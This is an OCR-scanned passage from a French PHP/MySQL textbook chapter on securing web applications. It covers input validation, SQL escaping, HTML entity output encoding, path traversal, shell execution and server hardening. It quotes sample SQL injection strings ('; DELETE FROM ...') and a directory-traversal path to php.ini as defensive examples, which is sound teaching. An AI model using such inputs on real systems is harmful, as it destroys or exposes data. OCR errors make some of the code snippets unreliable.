$nb_nuitees = (int)$_P0ST[ 1 nb_nuitees 1 ] ; 
if ($nb_nuitees == 0) { 
echo "ERREUR : Nombre de nuitees incorrect pour la chambre !"; 
exit; 

} 

Si l'utilisateur doit saisir une date sous un certain format, jj/mm/aa par exemple, nous 
pouvons verifier qu'il s'agit bien d'une veritable date a l'aide de la fonction checkdate ( ) 



1 > 

! Vous etes de sexe {$_P0ST[ 1 sexe ' ] } . 
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de PHP, qui prend un mois, un jour et une annee sur quatre chiffres en parametre et qui 
renvoie vrai si ces valeurs combinees forment une date correcte : 

// decoupe dans un tableau la valeur du champ contenant la "date" 
$mmjjaa = split ($_POST[ ' date_depart '] , '/'); 
if (count($mmj jaa) != 3) { 

echo "ERREUR : Format de date incorrect !"; 

exit; 

} 

// Gere les annees comme 02 ou 95 
if ( (int)$mmj jyy[2] < 100) { 
if ( (int)$mmj j yy [2] > 50) { 

$mmjjyy[2] = (int)$mmj jyy[2] + 1900; 
} else if ( (int)$mmj jyy[2] >= 0) { 
$mmjjyy[2] = (int)$mmj jyy[2] + 2000; 

} 

// sinon elle est < checkdate s'en apercevra 

} 

if ( ! checkdate ($mmjjyy[1 ] , $mmjjyy[0], $mmj j yy [2] ) ) { 
echo "ERREUR : Date incorrecte ! "; 
exit; 

} 

En prenant le temps de filtrer et de tester la validite des donnees que vous recevez, vous 
effectuez un test naturel initial (comme verifier que la date de depart pour un ticket 
d'avion est correcte) et vous participez a 1' amelioration de la securite de votre systeme. 



Securiser les cheilites pour SQL 

Nous devons egalement traiter les chaines pour nous premunir des attaques par injec- 
tion SQL, comme on l'a explique lorsque nous avons presente l'utilisation de MySQL 
avec PHP Avec ce type d'attaque, le pirate tente de tirer parti des programmes mal 
proteges et des permissions utilisateur pour executer du code SQL supplementaire qui 
n'effectue pas necessairement ce que Ton souhaite. Si Ton n'y prend pas garde, un nom 
d'utilisateur comme : 

kitty_cat; DELETE FROM utilisateurs; 

peut nous poser de gros problemes. 

II y a deux facons d'empecher ce type d'attaque : 

■ Filtrer et proteger toutes les chaines envoyees au SGBDR via SQL en utilisant les fonc- 
tions mysql_escape_string, mysqli::real_escape_string ou mysqli_real_escape_string. 

■ S' assurer que toutes les donnees recues correspondent a ce que Ton attend. Si les 
noms d'utilisateurs sont censes faire moins de 50 caracteres et ne comprendre que 
des lettres et des nombres, vous pouvez etre sur qu'un nom se terminant par "; 
DELETE FROM utilisateurs" ne doit pas etre autorise. Outre la reduction des 
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risques, ecrire du code PHP qui garantit que les donnees recues correspondent aux 
valeurs possibles avant de les envoyer au serveur de base de donnees signifie egale- 
ment que Ton peut afficher des messages d'erreurs plus significatifs que ceux 
produits par le SGBDR (pour peu qu'il verifie ce genre de choses). 

L' extension mysqli fournie avec PHP5 a egalement l'avantage de n'autoriser l'execu- 
tion que d'une seule requete avec mysqli query ou mysqli: :query. Pour lancer 
plusieurs requetes, vous devez explicitement utiliser les fonctions mysqli multi query 
ou mysqli: : multi query, ce qui permet d'empecher l'execution d' instructions ou de 
requetes supplementaires qui pourraient etre dangereuses. 

Proteger les sorties 

La protection des sorties est presque aussi importante que le filtrage des entrees car il 
est essentiel d'etre certain que les valeurs qui sont entrees dans notre systeme ne pour- 
ront pas causer de degats. Pour cela, on utilise deux fonctions permettant de garantir 
que le navigateur web du client ne pourra se servir de ces valeurs que pour les afficher. 

Certaines applications affichent sur une page ce qui a ete saisi par l'utilisateur. Celles 
permettant aux utilisateurs de poster des commentaires sur un article ou les forums de 
discussion web sont des exemples typiques de ce qui peut arriver si vous n'y prenez pas 
garde. Dans ces situations, nous devons verifier que les utilisateurs n'injectent pas de 
balises HTML malicieuses dans le texte qu'ils ont saisi. 

L'un des moyens les plus simples consiste a utiliser les fonctions htmlspecialchars ou 
htmlentities pour convertir en entites HTML certains caracteres de la chame qui leur 
est passee en parametre. Pour faire court, une entite HTML sert a representer un carac- 
tere qui ne peut pas apparaitre dans le code HTML ; c'est une sequence de caracteres 
speciale commencant par une esperluette (&) et se terminant par un point-virgule. Le 
nom de 1' entite est place entre ces deux symboles. Ce nom peut eventuellement etre un 
code ASCII en decimal, prefixe par le symbole diese (#) : / represente ainsi la 
barre de fraction (/). 

Les balises de HTML etant delimitees par les caracteres < et >, il est difficile d' utiliser 
ces deux symboles dans du texte normal puisque le navigateur supposera qu'ils delimi- 
tent des balises. Pour contourner ce probleme, il suffit d' utiliser les entites &lt ; et &gt ; . 
De meme, 1' esperluette ay ant une signification speciale puisqu'elle introduit une entite, 
il faut utiliser & pour la representer litteralement. Les apostrophes simples et 
doubles sont representees, respectivement, par &#39; et ". Toutes les entites 
HTML sont converties en sortie par le navigateur et ne sont done pas considerees 
comme faisant partie du balisage. 

Les comportements de htmlspecialchars et htmlentities sont differents : la premiere ne 
remplace, par defaut, que les symboles &, <, > et, eventuellement, les apostrophes doubles 
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ou simples. La seconde, en revanche, remplace tout ce qui peut etre represente par une 
entite nominee. Citons notamment le symbole de copyright ©, represente par © , 
et le symbole euro €, represente par €. Cependant, les caracteres ne seront pas 
convertis en entites numeriques. 

Ces deux fonctions prennent comme deuxieme parametre une valeur indiquant si elles 
doivent convertir les apostrophes simples et doubles en entites. Dans les deux cas, le 
troisieme parametre indique le jeu de caracteres dans lequel est encodee la chaine (ce 
qui est essentiel car nous avons besoin de gerer correctement les chaines UTF8). Les 
valeurs possibles du deuxieme parametre sont : 

■ ENT COMPAT. Les apostrophes doubles sont converties en &quot ; mais les apostrophes 
simples sont laissees telles quelles. 

■ ENT QUOTES. Les apostrophes simples et doubles sont converties, respectivement, en 
&#39; et ". 

■ ENT NOQUOTES (valeur par defaut). Les apostrophes simples et doubles ne sont pas 
converties. 

Soit le texte suivant : 

$chaine_saisie = «<FINCHAINE 

<p align= ' center ' > 

Un utilisateur nous a donne "15000€". 
</p> 

<script> 

// code JavaScript malicieux. 
</script> 

FINCHAINE; 

Si on l'execute avec le script PHP qui suit (nous appelons ici la fonction nl2br sur la 
chaine afin qu'elle soit correctement formatee dans le navigateur) : 

<?php 

Schaine = htmlspecialchars($chaine_saisie, ENT_N0QU0TES, "UTF-8"); 
echo nl2br($chaine) ; 

$chaine = htmlentities($chaine_saisie, ENT_QUOTES, "UTF-8"); 
echo nl2br($chaine) ; 

?> 

Voici ce que nous obtiendrons : 
<br /> 

<p align='center'><br /> 

Un utilisateur nous a donne "15000€".<br /> 
< /p><br /> 
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<br /> 

<script><br /> 

// code JavaScript malicieux.<br /> 

< /script><br /> 
<br /> 

<p align=&#039;center&#039;><br /> 
Un utilisateur nous a donné "15000€" .<br /> 
< /p><br /> 
<br /> 
<script><br /> 

// code JavaScript malicieux.<br /> 
< /script><br /> 

Ce qui apparaitrait comme ceci dans le navigateur : 

<p align= ' center ' > 

code JavaScript malicieux "15000€". 

</p> 

<script> 

// code JavaScript malicieux. 
</script> 

<p align= ' center ' > 

code JavaScript malicieux "15000€". 

</p> 

<script> 

// code JavaScript malicieux. 
</script> 

Vous pouvez remarquer que htmlentities, contrairement a htmlspecialchars , a 
remplace le e par &eacute ; et le symbole euro par &euro ; . 

Pour autoriser les utilisateurs a saisir certaines balises HTML, comme dans les forums 
de discussion ou certains apprecient de pouvoir controler la police, la couleur et le style 
(italique ou gras), il faut analyser les chaines pour trouver les balises qu'il ne faut pas 
supprimer. 

Organiser le code 

Certains pretendent que les fichiers qui ne doivent pas etre accessibles directement a 
partir d'lnternet devraient se trouver a l'exterieur de l'arborescence des documents du 
site web. Si la racine de cette arborescence est, par exemple, /home/httpd/forum/www 
sur le site de votre forum web, vous devriez placer tous les fichiers inclus dans un reper- 
toire comme Ihome/httpd/forum/www/code, puis les inclure avec 1' instruction suivante 
quand vous avez besoin d'eux : 

require_once( ' . . /code/objets.php) ; 
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Les raisons de cette precaution tiennent a ce qui se passe lorsqu'un utilisateur envoie 
une requete HTTP pour un fichier qui n'a pas 1' extension .php ou .html. En effet, de 
nombreux serveurs web adopteront en ce cas le comportement par defaut qui consiste a 
envoyer le contenu de ces fichiers dans leur reponse. Si objets.php est stocke dans 
l'arborescence publique et que l'utilisateur demande ce fichier, il pourra voir tout son 
contenu s'afficher dans son navigateur, ce qui lui permettra d'etudier 1' implementation, 
de contourner vos droits d'auteur et, eventuellement, de trouver des failles que vous 
auriez laissees. 

Pour empecher ces situations, assurez-vous que le serveur web est configure pour 
n'autoriser que les requetes pour des fichiers .php ou .html et pour qu'il renvoie une 
page d'erreur en reponse aux demandes d'autres types de fichiers. 

De meme, il est preferable de stacker a l'exterieur de l'arborescence publique du 
serveur tous les autres fichiers tels que les fichiers de mots de passe, les fichiers texte, 
les fichiers de configuration ou les repertoires speciaux. Meme si vous pensez que votre 
serveur web est configure correctement, vous pouvez avoir omis un detail. En outre, 
votre application web peut etre plus tard deplacee sur un serveur mal configure et vous 
vous retrouveriez a nouveau expose. 

Si la directive allow url fopen a ete activee dans php.ini, nous pouvons theorique- 
ment inclure des fichiers stockes sur des serveurs distants. Ce serait un autre risque pour 
la securite pour notre application : il est preferable d'eviter l'inclusion de fichiers stoc- 
kes sur d'autres machines que le serveur, surtout si vous n'avez pas le controle de ces 
machines. De meme, il ne faut pas se servir de ce qu'a saisi l'utilisateur pour choisir les 
fichiers a inclure, car une saisie erronee pourrait poser probleme. 

Contenu du code 

La plupart des extraits de code pour acceder aux bases de donnees que nous avons 
presentes contenaient le nom de la base, le nom de l'utilisateur et son mot de passe en 
texte clair, comme ici : 

$conn = @new mysqli( "localhost" , "bob", "secret", "ma_base"); 

Bien que cela soit pratique, ce n'est pas tres securise puisque des pirates pourraient 
mettre la main sur votre fichier .php et auraient ainsi un acces immediat a votre base 
avec tous les droits de bob. 

II est done preferable de placer le nom de l'utilisateur et son mot de passe dans un 
fichier qui ne se trouve pas dans l'arborescence des documents du serveur et de 
1' inclure dans votre script, comme ici : 

<?php 

// connexion_bd.php 
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$serveur_bd = 'localhost'; 
$utilisateur_bd = 'bob'; 
$mdp_bd = ' secret ' ; 
$nom_bd = ' ma_bd ' ; 

?> 

<?php 

include( ' . . /code/connexion. php) ; 

$conn = @new mysqli($serveur_bd, $utilisateur_bd, $mdp_bd, $nom_bd); 
// etc 

?> 

Vous devez proceder de la meme maniere avec toutes les autres donnees confidentielles 
pour lesquelles vous souhaitez ajouter une couche de protection supplementaire. 

Considerations sur le systeme de fichiers 

PHP peut manipuler le systeme de fichiers local. En ce qui nous concerne, ceci a deux 
implications : 

■ Est-ce que tous les fichiers que nous creons sur le disque seront visibles par les 
autres ? 

■ Si Ton expose cette fonctionnalite aux autres, pourront-ils acceder aux fichiers que 
l'on ne veut pas leur montrer, comme /etc/pas swd ? 

II faut faire attention a ne pas creer de fichiers avec des permissions ouvertes a tout le 
monde et a ne pas les placer a un endroit ou les autres utilisateurs d'un systeme comme 
Unix pourraient acceder. 

En outre, il faut etre tres prudent lorsque Ton autorise les utilisateurs a saisir le nom du 
fichier qu'ils souhaitent consulter. Si la racine de 1' arborescence publique du serveur est 
c:\websYorum\documents et que cette arborescence comprend un repertoire dans lequel 
on a place de nombreux fichiers accessibles aux utilisateurs qui peuvent saisir les noms 
des fichiers qu'ils veulent consulter, nous aurons des problemes s'ils demandent : 

. . \ . . \ . . \php\php.ini 

Cela leur permettrait de connaitre la configuration de PHP et de rechercher des failles 
qu'ils pourraient exploiter. La resolution de ce probleme, la aussi, est simple : si l'on 
autorise les utilisateurs a saisir un nom de fichier, il suffit de le filtrer severement pour 
eviter ce genre de situation. Pour l'exemple precedent, la suppression de toutes les 
occurrences de . . \ nous aiderait certainement, tout comme la suppression des tentatives 
d'acces par un chemin absolu comme c:\mysql\my.ini. 
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Stabilite du code et bogues 

Comme on l'a deja evoque, votre application web ne fonctionnera probablement pas parfai- 
tement et ne sera pas correctement securisee si son code n'a pas ete teste ni relu ou qu'il soit 
si complique qu'il doive etre rempli de bogues. Ce n'est pas une accusation, mais on 
constate que les programmeurs sont faillibles, comme le code qu'ils produisent. 

Si un utilisateur se connecte a un site web, entre un mot dans le champ de recherche 
("defenestration", par exemple) et clique sur le bouton Recherche r, il ne fera plus beaucoup 
confiance a la robustesse ou a la securite de ce site s'il obtient en reponse : 

Aie ! Ceci ne devrait jamais arriver. BUG BUG BUG !!!! 

Si nous prenons en compte des le depart la stabilite de notre application, nous pouvons 
reduire efficacement la probabilite des problemes dus aux erreurs humaines. Voici 
comment y parvenir : 

■ Realiser une phase de conception methodique du produit, eventuellement avec 
des prototypes. Plus il y aura de personnes pouvant donner leur avis sur ce que 
nous voulons faire, plus elles pourront detecter de problemes, meme avant que nous 
commencions. C'est egalement le moment ideal pour tester l'ergonomie de notre 
interface. 

I Allouer des ressources pour les tests du projet. Tant de projets lesinent sur cette 
depense ou embauchent un seul testeur pour un projet de cinquante developpeurs ! 
Generalement, les developpeurs ne sont pas de bons testeurs ! lis sont tres bons 
pour verifier que leur code fonctionne si on lui fournit des donnees correctes, mais 
ils sont beaucoup moins efficaces pour trouver les autres problemes. Les plus gros- 
ses societes d'edition de logiciels ont quasiment autant de testeurs que de deve- 
loppeurs et, bien qu'il soit probable que votre chef n'en fera jamais autant, il faut 
neanmoins que vous disposiez de quelques ressources pour les tests : c'est essentiel 
pour le succes de 1' application. 

■ Faire en sorte que les developpeurs utilisent une methode de tests. Cela ne 
permettra pas de trouver tous les bogues qu'un testeur aurait trouves mais, au 
moins, le produit ne regressera pas (la regression intervient lorsque des bogues qui 
avaient deja ete corriges sont reintroduits par une modification du code). Les deve- 
loppeurs ne doivent pas etre autorises a apporter leurs modifications au projet tant 
que tous les tests unitaires n'ont pas reussi. 

■ Surveiller le fonctionnement de I'application apres son deploiement. En consul- 
tant regulierement les fichiers journaux, en prenant connaissance des commentaires 
des clients/utilisateurs, vous pourrez savoir si des problemes importants ou si des 
trous de securite possibles apparaissent. Si c'est le cas, vous pourrez agir pour les 
corriger avant qu'ils n'empirent. 
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Apostrophes d'execution et exec 

Nous avons brievement mentionne une fonctionnalite appelee apostrophes d'execution. 
II s'agit essentiellement d'un operateur du langage permettant d'executer une 
commande quelconque dans un shell de commande (une variante de sh avec Unix ou 
cmd.exe avec Windows) en entourant cette commande d' apostrophes inverses ('). Ce 
symbole s'obtient en faisant AltGr+7 sur un clavier PC francais (ou directement avec la 
touche a gauche d' Entree sur un clavier Mac frangais). 

Les apostrophes d'execution renvoient une chame contenant le resultat affiche par le 
programme execute. 

Si Ton dispose d'un fichier texte contenant une liste de noms et de numeros de tele- 
phone, la commande grep nous permet de trouver la liste des noms contenant 
"Dupont". grep est une commande Unix prenant en parametre une expression reguliere 
a rechercher dans la liste des fichiers qui lui est fournie en entree. Elle renvoie la liste 
des lignes de ces fichiers qui correspondent a ce motif. Sa syntaxe est de la forme 

grep [params] motif fichiers... 
II existe une version Windows de cette commande et Windows lui-meme est fourni avec 
le programme findstr.exe, qui fait la meme chose. Le script suivant permet done de 
trouver les personnes qui s'appellent "Dupont" : 

<?php 

// -i pour ignorer la casse 

$utilisateurs = 'grep -i dupont / home /httpd /www/ num_tel. txt" ; 

// Place les lignes de la sortie dans un tableau 
// Attention, remplacer \n par \r\n avec Windows ! 
$lignes = split($utilisateurs, "\n"); 

foreach ($lignes as $ligne) { 

// Les noms et les numeros sont separes par le caractere , 
$nom_num = split ($ligne , ','); 

echo "Nom : {$nom_num[0] } , Tel : {$nom_num[ 1 ] }<br/>\n " ; 

} 

?> 

Si vous autorisez l'utilisateur a fournir la commande placee entre les apostrophes inver- 
ses, vous vous exposez a toutes sortes de problemes de securite et vous devrez filtrer 
tres soigneusement la chaine qui vous a ete passee si vous voulez garantir la securite de 
votre systeme. Au pire, utilisez la fonction escapeshellcmd, mais e'est un minimum et 
vous devrez utiliser un filtrage plus efficace pour plus de securite. 

Pire encore : comme le serveur web et PHP s'executent generalement dans un contexte 
ayant les permissions minimales (voir les sections suivantes), vous devrez leur donner 
plus de droits pour executer certaines de ces commandes, ce qui peut compromettre 
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encore plus la securite du systeme. L' utilisation de cet operateur dans un environnement 
en production doit done etre soumise a une etude tres rigoureuse. 

Les fonctions exec et system ressemblent beaucoup aux apostrophes d'execution, sauf 
qu'elles executent directement la commande au lieu de passer par un shell et qu'elles ne 
renvoient pas toujours l'ensemble des lignes produites par les apostrophes inverses. 
Elles posent les memes problemes de securite et meritent done la meme attention. 

Securiser le serveur web et PHP 

Outre la securite de votre code, l'installation et la configuration de votre serveur web et 
de PHP sont egalement des elements importants d'une politique de securite. La plupart 
des logiciels que Ton installe sur un ordinateur sont fournis avec des fichiers de confi- 
guration et des valeurs par defaut choisies pour montrer la puissance du programme. 
Ces choix supposent que Ton desactivera les parties dont on n'a pas besoin et/ou qui ne 
sont pas assez securisees a notre gout. Malheureusement, beaucoup ne pensent pas a le 
faire ou ne prennent pas le temps de le faire serieusement. 

Une partie de notre approche pour gerer la securite "globalement" consiste evidemment 
a s'assurer que les serveurs web et PHP sont correctement configures. Bien que nous ne 
puissions pas ici presenter la totalite des options permettant de securiser chaque serveur 
ou chaque extension de PHP, nous pouvons au moins fournir quelques indications 
essentielles et vous diriger dans la bonne direction au cas ou vous auriez besoin de plus 
de renseignements ou d'avis. 

Garder les logiciels a jour 

L'un des moyens les plus simples pour favoriser la securite d'un systeme consiste a 
s'assurer qu'on utilise toujours la derniere et la plus securisee des versions d'un logi- 
ciel. En ce qui concerne PHP, Apache et IIS, cela signifie que Ton doit visiter reguliere- 
ment leurs sites respectifs (www.php.net, httpd.apache.org et www.microsoft.com/ 
iis) pour prendre connaissance des dernieres alertes de securite, de la sortie des nouvel- 
les versions et pour rechercher dans la liste des nouvelles fonctionnalites si certaines 
corrigent des bogues lies a la securite. 

Mettre en place la nouvelle version 

La configuration et l'installation de certains de ces programmes peut prendre du temps et 
necessiter un grand nombre d'etapes. C'est notamment le cas sur Unix lorsqu'on installe ces 
programmes a partir de leurs sources car cela peut necessiter l'installation prealable d'un 
certain nombre d'autres logiciels et de fournir un grand nombre d'options en ligne de 
commande pour que les extensions et modules requis soient actives. 
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Pour chaque programme, ecrivez toujours un petit "script" d' installation que vous utili- 
serez a chaque fois que vous installez une nouvelle version du logiciel. De la sorte, vous 
etes sur de ne pas oublier quelque chose d'important dont l'absence pourrait poser 
probleme plus tard. Le nombre d'etapes est tel qu'il est quasiment certain que vous ne 
vous rappellerez pas les details exacts a chaque fois que vous lancez une installation. 



Deploy er la nouvelle version 

II ne faut jamais installer un nouveau programme directement sur le serveur en produc- 
tion. Vous devez toujours disposer d'un serveur de tests sur lequel installer les program- 
mes et les applications web et vous assurer que tout fonctionne correctement. C'est tout 
specialement vrai avec un langage comme PHP, ou certains reglages par defaut chan- 
gent entre les versions : il faut imperativement lancer une suite de tests et l'utiliser en 
pratique avant de pouvoir etre certain que la nouvelle version du logiciel n'affecte pas 
malencontreusement votre application. 

Vous n'avez pas besoin de depenser des milliers d' euros pour acheter une nouvelle 
machine reservee aux tests et aux essais de configuration. De nombreux programmes, 
comme VMware ou Virtualbox, permettent desormais de creer des machines virtuelles 
et de lancer un systeme d' exploitation dans le votre. 

Apres avoir verine que la nouvelle version du logiciel fonctionne correctement avec 
votre application web, vous pouvez le deployer sur les serveurs en production. Vous 
devez etre absolument sur que ce processus est soit automatise, soit decrit par un script 
sur papier (ou sur disque) arm de suivre la sequence d'etapes exacte et de repliquer 
l'environnement correct du serveur. Pour finir, effectuez quelques tests sur le serveur 
afm de verifier que tout fonctionne correctement (voir Figure 14.2). 



Figure 14.2 

Mise a jour 
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Lire le f ichier php.ini 

Si vous n'avez pas encore passe beaucoup de temps a parcourir le contenu du fichier 
php.ini, c'est le bon moment pour le faire en le chargeant dans un editeur de texte. La 
plupart de ses entrees sont precedees de commentaires appropries decrivant leur role. 
Elles sont classees par fonctionnalites/nom d'extension ; les noms de toutes les options 
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de mbstring commencent par mbstring alors que les options liees aux sessions (voir 
Chapitre 21) sont prefixees par session. 

II existe un grand nombre d'options de configuration pour des modules que nous n'utili- 
serons jamais ; si ces modules sont desactives, il n'est pas necessaire de s'occuper de 
leurs options puisqu'elles seront ignorees. En revanche, il est important de consulter la 
documentation en ligne de PHP (www.php.net/manual) pour connaitre les options 
fournies par les extensions que Ton utilise et leurs valeurs possibles. 

La encore, il est fortement conseille de faire des sauvegardes regulieres de php.ini ou 
d'ecrire quelque part les modifications que Ton y a apportees ann d'etre sur qu'elles 
sont toujours la apres avoir installe une nouvelle version. 

Le seul piege de cette configuration est qu'un logiciel ancien ecrit en PHP peut exiger 
que les options register globals et/ou register long arrays soient activees. En ce 
cas, vous devez choisir entre ce logiciel et le risque qu'il fait courir a la securite. Vous 
pouvez attenuer ce risque en recherchant regulierement les correctifs de securite et les 
autres mises a jour de ce logiciel. 

Configurer le serveur web 

Une fois que Ton a confiance dans son installation de PHP, on peut passer a celle du 
serveur web. Chaque serveur utilise sa propre configuration pour la securite et nous 
presenterons ici celles des deux serveurs les plus connus : Apache et Microsoft IIS. 

Le serveur Apache 

Bien que le serveur httpd soit fourni avec une configuration par defaut relativement 
securisee, nous devons verifier quelques points avant de l'utiliser dans un environne- 
ment de production. Toutes les options de configuration se trouvent dans le fichier 
httpd.conf, qui se trouve generalement dans le sous-repertoire conf du repertoire de 
base de l'installation {/usr/local/ apache/ conf ou c:\Apache\conf, par exemple). Vous 
devez avoir lu attentivement les sections concernant la securite dans la documentation 
en ligne du serveur (httpd.apache.org/docs-project). 

Assurez-vous d'effectuer les etapes suivantes : 

I Verifiez que httpd s'execute sous le compte d'un utilisateur (nobody ou httpd sous 
Unix, par exemple) qui n'a pas les privileges administrateur. Cet utilisateur est 
defini par les options User et Group dans httpd.conf. 

■ Verifiez que les permissions des fichiers du repertoire d'installation d'Apache sont 
correctes. Avec Unix, cela implique de verifier que tous les repertoires, sauf la 
racine de l'arborescence des documents (qui est, par defaut, le repertoire htdocs/) 
appartiennent a root et ont les permissions 755. 
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■ Verifiez que le serveur est configure pour pouvoir traiter un nombre correct de 
connexions simultanees. Avec les versions 1.3.x d' Apache, fixez la valeur de Max 
Clients avec un nombre raisonnable de clients (la valeur par defaut, 150, convient 
generalement mais vous pouvez l'augmenter si vous vous attendez a une charge 
plus elevee). Avec les versions 2.x d'Apache, qui utilisent les threads, verifiez la 
valeur de ThreadsPerChild (la valeur par defaut, 50, convient generalement). 

■ Cachez les fichiers que vous ne voulez pas montrer en incluant les directives 
adequates dans httpd.conf. Pour cacher les fichiers .inc, par exemple, ajoutez la 
directive suivante : 

<Files - "\.inc$"> 

Order allow, deny 

Deny from all 
</Files> 

Comme on l'a indique plus haut, vous devez egalement deplacer ces fichiers en dehors 
de F arborescence des documents du site web. 

Le serveur IIS de Microsoft 

La configuration de IIS n'utilise pas un fichier de configuration comme Apache, mais 
vous devez quand meme effectuer un certain nombre de reglages pour securiser votre 
installation : 

■ Evitez que les sites web se trouvent sur le meme disque que le systeme d'exploitation. 

■ Utilisez le systeme de fichiers NTFS et prenez du temps pour supprimer les droits 
d' denture aux endroits appropries. 

■ Supprimez tous les fichiers installes par IIS dans 1' arborescence des documents car 
il y a de fortes chances pour que vous n'en ayez jamais besoin. Le repertoire inetpub 
contient un grand nombre de fichiers dont vous n'aurez pas besoin si vous n' utilisez pas 
les outils de configuration en ligne (ce que vous ne devez pas faire : utilisez l'utili- 
taire iisadmin a la place). 

■ Evitez d'utiliser des noms classiques. Un grand nombre de programmes hostiles 
recherchent les scripts et les programmes dans les sous-repertoires Scripts, cgi-bin, 
bin, etc. de votre arborescence des documents. 

La aussi, il est fortement conseille de lire les procedures de securite recommandees 
dans la documentation de IIS. 

Applications web chez des hebergeurs 

Les applications web qui s'executent chez un hebergeur PHP/MySQL rencontrent un peu 
plus de problemes de securite. En effet, il est rare que Ton ait acces au fichier php.ini de ces 
serveurs et Ton ne peut done pas configurer les options comme on le souhaite. Dans les cas 
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extremes, certains services d'hebergement ne permettent meme pas de creer des repertoires 
a l'exterieur de l'arborescence des documents, ce qui nous prive d'un endroit sur 
pour stacker les fichiers inclus. Heureusement, la plupart de ces societes veulent conserver 
leurs clients et font done des efforts pour assurer la securite des applications. 

Vous pouvez et devez passer par quelques etapes avant de choisir un service d'hebergement 
et d'y deploy er vos applications : 

■ Avant de choisir le service, examinez la liste du support technique. Les meilleurs 
services auront une documentation en ligne complete (certains proposent meme 
d'excellents didacticiels) qui montre exactement comment sera configure votre 
espace prive. En la parcourant, vous pourrez connaitre les restrictions qui s'appliquent 
et le support dont vous beneficierez. 

■ Preferez les services d'hebergement qui vous octroient des arborescences de reper- 
toires completes, pas simplement une arborescence de documents. Pour certains, le 
repertoire racine de votre espace prive sera la racine de l'arborescence de vos docu- 
ments ; avec d'autres, vous disposerez d'une arborescence complete et vos documents 
et vos scripts seront stockes dans public _html. Dans ce dernier cas, vous pourrez 
creer un repertoire includes pour y placer vos fichiers inclus et les cacher au monde 
exterieur. 

■ Essayez de connaitre les valeurs utilisees dans php.ini. Meme si la plupart des 
hebergeurs n'afficheront pas ces valeurs sur une page web et ne vous enverront pas 
ce fichier par e-mail, vous pouvez demander au service technique si, par exemple, le 
mode securise est active et quelles sont les fonctions et les classes qui sont desacti- 
vees. Pour connaitre ces informations, vous pouvez egalement utiliser la fonction 
ini get. Les hebergeurs qui n'utilisent pas le mode securise et qui ne desactivent 
aucune fonction nous inquietent plus que ceux ayant une configuration qui semble 
raisonnable. 

■ Renseignez-vous sur les versions des logiciels utilises. Est-ce que ce sont les plus 
recentes ? Si vous n'avez pas le droit de consulter le resultat d'une fonction comme 
phpinf o, faites appel a un service comme Netcraft (http://www.netcraft.com) qui 

vous renseignera sur ce point. Assurez-vous que cet hebergeur utilise bien PHP 5 ! 

■ Recherchez les services qui proposent une periode d'essai, des garanties de 
remboursement ou tout autre moyen de tester d'abord si vos applications s'executeront 
avant de vous engager pour une longue periode. 

Securiser le serveur de base de donnees 

Outre les mises a jour du logiciel, nous pouvons effectuer quelques operations pour que 
nos bases de donnees soient plus securisees. La encore, une presentation complete de la 
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securite de tous les SGBDR utilisables dans nos applications web necessiterait un 
ouvrage complet, aussi nous contenterons-nous de presenter quelques strategies gene- 
rales. 

Utilisateurs et systeme de permissions 

Passez du temps a comprendre le systeme d'authentification et de permissions de votre 
SGBDR. Un nombre etonnant d'attaques reussissent simplement parce que Ton n'a pas 
pris le temps de verifier que le systeme est securise. 

Assurez-vous que tous les comptes ont des mots de passe. L'une des premieres opera- 
tions a realiser sur un SGBDR consiste a verifier que le compte administrateur de la 
base de donnees possede un mot de passe. Verifiez egalement que ces mots de passe ne 
contiennent pas des mots du dictionnaire : meme un mot de passe comme 44chevalA 
est moins sur que FI93! !xl2@. Si vous vous inquietez de la memorisation de ces mots 
de passe, utilisez par exemple la premiere lettre de tous les mots d'une phrase, en 
melangeant minuscules et majuscules, comme LaQsBsLbP pour "Les amoureux qui se 
becotent sur les bancs publics?" (Georges Brassens). 

De nombreux SGBDR (dont les anciennes versions de MySQL) creent lors de leur 
installation un utilisateur anonyme qui possede plus de privileges que vous ne le 
souhaiteriez probablement. Pendant que vous etudiez le systeme de permissions, assu- 
rez-vous que les eventuels comptes par defaut font exactement ce que vous voulez 
qu'ils fassent et supprimez ceux qui ne le font pas. 

Verifiez que le compte administrateur a acces aux tables des permissions et aux bases 
de donnees administratives. Les autres comptes ne devraient pouvoir acceder ou modifier 
que les bases ou les tables dont ils ont strictement besoin. 

Pour le tester, essayez les operations suivantes et verifiez qu'elles provoquent des 
erreurs : 

■ Connectez-vous sans fournir de nom d' utilisateur ni de mot de passe. 

■ Connectez-vous sous le compte administrateur sans fournir de mot de passe. 

■ Connectez-vous sous le compte administrateur en fournissant un mauvais mot de 
passe. 

■ Connectez-vous sous un compte utilisateur normal et essayez d' acceder a une table 
qui ne devrait pas lui etre accessible. 

■ Connectez-vous sous un compte utilisateur normal et essayez d' acceder a la base de 
donnees du systeme ou aux tables des permissions. 
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Envoi de donnees au serveur 

Comme nous l'avons repete sans cesse dans ce livre (et comme nous continuerons de 
le faire), n'envoyez jamais des donnees non nltrees au SGBDR. Utilisez les differen- 
tes fonctions fournies par les extensions pour proteger les chames (comme 
mysqli real escape string) ami de disposer d'une protection de base. 

Cependant, comme on l'a vu, ces fonctions ne suffisent pas : vous devez egalement 
verifier le type de chaque champ envoye par un formulaire. Si ce champ doit contenir 
un nom d'utilisateur, il faut etre sur qu'il ne contienne pas plusieurs kilo-octets de 
donnees ni des caracteres qui n'ont rien a faire dans un nom d'utilisateur. En testant la 
validite des donnees (que ce soient des chames, des nombres, des dates ou des heures), 
nous pouvons produire des messages d'erreur plus lisibles et reduire certains risques de 
securite pour nos bases de donnees. 

Enfm, nous pouvons utiliser des instructions preparees sur les serveurs qui l'autorisent 
car elles protegeront les donnees pour nous et s'assureront que tout est place entre apos- 
trophes lorsque cela est necessaire. 

La encore, certains tests vous permettront de verifier que le SGBDR traite correctement 
les donnees : 

■ Essayez d'entrer des valeurs comme '; DELETE FROM TableTest ', etc. 

■ Pour les champs numeriques ou de dates, essayez d'entrer des valeurs totalement 
fantaisistes, comme ' 55#$888ABC ' , et verifiez que vous obtenez une erreur. 

■ Essayez d'entrer des valeurs qui depassent les limites de taille que vous avez choisies et 
verifiez que cela provoque une erreur. 

Connexion au serveur 

II existe quelques moyens de maintenir la securite des SGBDR en controlant leurs 
connexions. L'un des plus simples consiste a limiter les personnes autorisees a se 
connecter. De nombreux systemes de permissions utilises dans les SGBDR permettent 
de preciser non seulement le nom de 1' utilisateur et son mot de passe, mais egalement 
les machines a partir desquelles il est autorise a se connecter. Si le SGBDR est sur la 
meme machine que le serveur web et que PHP, il est certainement assez logique de 
n'autoriser que les connexions provenant de localhost ou de l'adresse IP de cette 
machine. Si le serveur web est toujours sur un meme ordinateur, il est a peu pres normal 
